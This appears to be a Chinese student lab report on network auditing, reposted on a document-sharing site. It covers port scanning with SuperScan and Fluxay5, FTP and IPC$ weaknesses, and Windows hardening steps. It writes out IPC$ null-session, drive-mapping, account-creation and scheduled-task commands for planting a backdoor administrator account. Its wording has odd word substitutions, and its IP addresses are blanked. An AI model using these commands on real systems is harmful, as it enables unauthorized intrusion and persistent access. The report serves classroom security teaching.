版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)
文檔簡(jiǎn)介
實(shí)驗(yàn)三:網(wǎng)絡(luò)審計(jì)實(shí)驗(yàn)實(shí)驗(yàn)?zāi)康氖箤W(xué)生掌握網(wǎng)絡(luò)端口掃描器的使用辦法,熟悉常見端口和其對(duì)應(yīng)的服務(wù)程序,掌握發(fā)現(xiàn)系統(tǒng)漏洞的辦法。掌握綜合掃描及安全評(píng)定工具的使用辦法,理解進(jìn)行簡(jiǎn)樸系統(tǒng)漏洞入侵的辦法,理解常見的網(wǎng)絡(luò)和系統(tǒng)漏洞以及其安全防護(hù)辦法。實(shí)驗(yàn)環(huán)境(實(shí)驗(yàn)所使用的器件、儀器設(shè)備名稱及規(guī)格)Windows操作系統(tǒng)、SuperScan端口掃描工具、流光Fluxay5綜合掃描工具。實(shí)驗(yàn)任務(wù)及其規(guī)定任務(wù)一:使用Superscan端口掃描工具并分析成果。任務(wù)二:使用綜合掃描工具Fluxay5并分析成果。任務(wù)三:進(jìn)行簡(jiǎn)樸的攻擊。實(shí)驗(yàn)過程及分析任務(wù)一:使用Superscan端口掃描工具并分析成果分組角色:學(xué)生A、學(xué)生B互相掃描對(duì)方主機(jī)。實(shí)驗(yàn)環(huán)節(jié):(1)在命令符提示下輸入IPCONFIG查詢自己的IP地址(本機(jī)的IP地址為0對(duì)方的IP地址為)。(2)在Superscan中的HostnameLookup欄中,輸入同組學(xué)生主機(jī)的IP地址(),可通過單擊Lookup按鈕獲得主機(jī)名(如圖1所示)。圖1獲得對(duì)方主機(jī)顧客名設(shè)立IP欄、Scantype欄、Scan欄,使其對(duì)同組學(xué)生主機(jī)的全部端口以默認(rèn)的時(shí)間參數(shù)進(jìn)行掃描(如圖2所示)。圖2配備掃描參數(shù)根據(jù)掃描成果分析主機(jī)開放的端口類型和對(duì)應(yīng)的服務(wù)程序(如圖3所示)。圖3掃描成果通過“控制面板”的“管理工具”中的“服務(wù)”配備(如圖4所示),嘗試關(guān)閉或開放目標(biāo)主機(jī)上的部分服務(wù),重新掃描,觀察掃描成果的變化。圖4查看未修改時(shí)服務(wù)狀態(tài)常見端口的關(guān)閉辦法:1、關(guān)閉79等端口:關(guān)閉SimpleTCP/IPService,支持下列TCP/IP服務(wù):CharacterGenerator,Daytime,Discard,Echo,以及QuoteoftheDay。關(guān)閉80端口:關(guān)掉WWW服務(wù)。在“服務(wù)”中顯示名稱為“WorldWideWebPublishingService”,通過Internet信息服務(wù)的管理單元提供Web連接和管理。3、關(guān)掉25端口:關(guān)閉SimpleMailTransportProtocol(SMTP)服務(wù),它提供的功效是跨網(wǎng)傳送電子郵件。4、關(guān)掉21端口:關(guān)閉FTPPublishingService,它提供的服務(wù)是通過Internet信息服務(wù)的管理單元提供FTP連接和管理。5、關(guān)掉23端口:關(guān)閉Telnet服務(wù),它允許遠(yuǎn)程顧客登錄到系統(tǒng)并且使用命令行運(yùn)行控制臺(tái)程序。6、關(guān)掉139端口,139端口是NetBIOS Session端口,用來文獻(xiàn)和打印共享,關(guān)閉139口聽辦法是在“網(wǎng)絡(luò)和撥號(hào)連接”中“本地連接”中選用“Internet合同(TCP/IP)”屬性,進(jìn)入“高級(jí)TCP/IP設(shè)立”“WINS設(shè)立”里面有一項(xiàng)“禁用TCP/IP的NETBIOS”,打勾就關(guān)閉了139端口(如圖5所示)。圖5關(guān)掉139端口運(yùn)用TCP/IP篩選:網(wǎng)上鄰居屬性-本地連接屬性-常規(guī)-internet合同(TCP/IP)屬性-高級(jí)-選項(xiàng)-TCP/IP篩選-屬性-TCP端口-只允許139,445,這樣其它端口就都被關(guān)閉了(如圖6、7所示)。圖6只允許139,445通過圖7成果掃描圖任務(wù)二:使用綜合掃描工具Fluxay5并分析成果圖8各部份功效圖1:暴力破解的設(shè)立區(qū)域2:控制臺(tái)輸出3:掃描出來的典型漏洞列表4:掃描或者暴力破解成功的顧客帳號(hào)5:掃描和暴力破解的速度控制6:掃描和暴力破解時(shí)的狀態(tài)顯示7:中斷按鈕8:探測(cè)統(tǒng)計(jì)查找基本設(shè)立以下(如圖9所示):圖9基本設(shè)立圖選擇“文獻(xiàn)(F)”→“高級(jí)掃描向?qū)В╓)”可打開高級(jí)掃描向?qū)?,設(shè)立掃描參數(shù)。掃描結(jié)束后,流光會(huì)自動(dòng)打開HTML格式的掃描報(bào)告,并且還把可運(yùn)用的主機(jī)列在流光界面的最下方。單擊主機(jī)列表中的主機(jī)便能夠直接對(duì)目的主機(jī)進(jìn)行連接操作(如圖10所示)對(duì)目的主機(jī)進(jìn)行連接操作示意圖除了使用“高級(jí)掃描向?qū)А迸鋫涓呒?jí)掃描外,還能夠在探測(cè)菜單中直接選用高級(jí)掃描工具設(shè)立(如圖11所示):圖11探測(cè)菜單中直接選用高級(jí)掃描工具設(shè)立圖分組角色:學(xué)生A、學(xué)生B互相掃描對(duì)方主機(jī)。實(shí)驗(yàn)環(huán)節(jié):開放FTP服務(wù),允許匿名連接(此處掃描的主機(jī)IP地址為45)。(2)打開流光FLUXAY5工具,使用“高級(jí)掃描向?qū)А边M(jìn)行設(shè)置,使其能對(duì)同組學(xué)生主機(jī)的全部端口、服務(wù)、漏洞、所有顧客等進(jìn)行全方面的掃描(如圖12所示)。圖12掃描成果(3)認(rèn)真觀察掃描成果,分析同組學(xué)生主機(jī)上存在的多個(gè)漏洞。(4)根據(jù)掃描成果分析FTP漏洞:如成果顯示有漏洞,則運(yùn)用“流光”提供的入侵菜單進(jìn)行FTP連接,嘗試上傳或下載文獻(xiàn)(如圖13、14所示)。圖13建立ftp連接圖14嘗試上傳文獻(xiàn)(5)根據(jù)掃描成果分析IPC$漏洞:IPC是為了讓進(jìn)程間通信而開放的命名管道,能夠通過驗(yàn)證顧客名和密碼獲得對(duì)應(yīng)的權(quán)限,在遠(yuǎn)程管理計(jì)算機(jī)和查看計(jì)算機(jī)的共享資源時(shí)使用。運(yùn)用IPC$,連接者能夠與目的主機(jī)建立一種空連接而無需顧客名和密碼,從而可以得到目的主機(jī)上的顧客列表,并可能破解顧客密碼。IPC$有關(guān)命令:建立和目的的ipc$連接命令:netuse\\目的IP\ipc$“密碼”/user:“ADMIN”(管理員賬號(hào)),如:netuse\\28\ipc$“”/user:"administrator";映射網(wǎng)絡(luò)驅(qū)動(dòng)器命令(將目的主機(jī)的盤映射到本地磁盤):netuse本地盤符\\目的IP\盤符$,如:netusez:\\28\c$;和目的建立了ipc$后,則可直接用IP加盤符加$訪問。例如:copy文獻(xiàn)名\\IP\盤符$\途徑\文獻(xiàn)名,如:copyhack.bat\\28\c$,也可直接對(duì)映射為本地磁盤的網(wǎng)絡(luò)驅(qū)動(dòng)器操作。4.管理計(jì)算機(jī)上面的賬號(hào)命令:netuser查看賬號(hào)命令:netuser建立賬號(hào)命令:netusernamepasswd/add(netusersysbak123456/add:添加顧客名為sysback,密碼為123456的賬號(hào))刪除賬號(hào)命令:netusername/delete管理工作組命令:netlocalgroup組名顧客名/add[delete] 如:netlocalgroupadministratorssysback/add。該命令表達(dá)把sysback顧客添加到管理員組(administrators)。6.查看目的計(jì)算機(jī)的系統(tǒng)時(shí)間:nettime\\ip7.在遠(yuǎn)程主機(jī)上建立計(jì)劃任務(wù):at\\IPTIMECOMMANDat\\2813:45c:\hack.bat(該命令表達(dá)在下午13點(diǎn)45分執(zhí)行目的主機(jī)C盤中的hack.bat文獻(xiàn),時(shí)間一定要晚于現(xiàn)在遠(yuǎn)程主機(jī)系統(tǒng)時(shí)間)刪除和目的的ipc$鏈接命令:netuse\\IP\ipc$/del斷開全部ipc$鏈接:netuse*/del嚴(yán)禁建立空連接:運(yùn)行regedit,找到主鍵 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA],把Restrict Anonymous(DWORD)的鍵值改為:00000001.嚴(yán)禁自動(dòng)打開默認(rèn)共享:找到主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters],把AutoShareServer(DWORD)的鍵值改為:00000000,如果不存在,就新建一種該鍵值。任務(wù)三:運(yùn)用破解的顧客ADMINISTRATOR對(duì)目的主機(jī)進(jìn)行留后門入侵,環(huán)節(jié):編寫批解決文獻(xiàn)hack.bat,文獻(xiàn)中包含兩個(gè)命令:1)建立一種賬號(hào),2)將新賬號(hào)加入administrators組。使用net命令與目的主機(jī)進(jìn)行連接。將批解決文獻(xiàn)hack.bat拷貝到目的主機(jī)上。通過計(jì)劃任務(wù)使目的主機(jī)執(zhí)行hack.bat文獻(xiàn)。斷開全部ipc$連接。通過采用新賬號(hào)與目的主機(jī)建立連接來驗(yàn)證賬號(hào)與否成功建立。刪除和目的主機(jī)的連接。執(zhí)行安全防護(hù)方法:目的主機(jī)對(duì)注冊(cè)
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁(yè)內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫(kù)網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。
最新文檔
- 第三節(jié)水圈和水循環(huán)教案
- 《樓宇經(jīng)濟(jì)發(fā)展情況報(bào)告》
- 屋頂餐廳屋頂防水修繕協(xié)議
- 蘇教版五年級(jí)上冊(cè)美術(shù)教案
- 冷凍倉(cāng)儲(chǔ)服務(wù)合同
- 河道城市辦公設(shè)施工程合同
- 建筑綠化模板施工承包合同
- 航空航天甲方現(xiàn)場(chǎng)管理辦法
- 玩具零售聯(lián)營(yíng)合同
- 教育工程合同教學(xué)質(zhì)量
- 燒傷護(hù)理查房小兒燒傷護(hù)理查房PPT
- 婦聯(lián)五年工作總結(jié)九篇
- 鍋爐使用單位每日鍋爐安全檢查記錄、每周鍋爐安全排查治理報(bào)告、每月鍋爐安全月調(diào)度會(huì)議紀(jì)要
- 饑荒游戲修改編程
- 牧童笛的基礎(chǔ)知識(shí)與演奏技能 用舌技術(shù)怎樣演奏好吐音
- 康復(fù)醫(yī)學(xué)課件:骨關(guān)節(jié)疾病康復(fù)
- 牽引及石膏病人的護(hù)理
- 鐵路混凝土拌和站標(biāo)準(zhǔn)化管理演示
- 2023年現(xiàn)行施工規(guī)范大全
- 競(jìng)爭(zhēng)性磋商評(píng)分辦法綜合評(píng)分法
- 林漢達(dá)中國(guó)歷史故事集導(dǎo)讀
評(píng)論
0/150
提交評(píng)論